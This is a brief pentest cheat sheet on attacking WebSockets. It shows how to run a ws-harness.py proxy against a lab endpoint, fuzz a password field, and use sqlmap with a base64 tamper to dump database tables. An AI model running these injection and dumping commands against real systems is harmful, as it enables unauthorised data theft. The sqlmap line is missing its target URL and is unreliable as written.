# Web Sockets Attacks

> The WebSocket protocol allows a bidirectional and full-duplex communication between a client and a server

## Summary

* [Tools](#tools)
* [Using ws-harness.py](#using-ws-harness-py)

## Tools

* [ws-harness.py](https://gist.githubusercontent.com/mfowl/ae5bc17f986d4fcc2023738127b06138/raw/e8e82467ade45998d46cef355fd9b57182c3e269/ws.harness.py)

## Using ws-harness.py

Start ws-harness to listen on a web-socket, and specify a message template to send to the endpoint.

python ws-harness.py -u "ws://dvws.local:8080/authenticate-user" -m ./message.txt

The content of the message should contains the **[FUZZ]** keyword.

{"auth_user":"dGVzda==", "auth_pass":"[FUZZ]"}

Then you can use any tools against the newly created web service, working as a proxy and tampering on the fly the content of message sent thru the websocket.

sqlmap -u --tables --tamper=base64encode --dump

## References

- [HACKING WEB SOCKETS: ALL WEB PENTEST TOOLS WELCOMED by Michael Fowl | Mar 5, 2019](https://www.vdalabs.com/2019/03/05/hacking-web-sockets-all-web-pentest-tools-welcomed/)
- [Hacking with WebSockets - Qualys - Mike Shema, Sergey Shekyan, Vaagn Toukharian](https://media.blackhat.com/bh-us-12/Briefings/Shekyan/BH_US_12_Shekyan_Toukharian_Hacking_Websocket_Slides.pdf)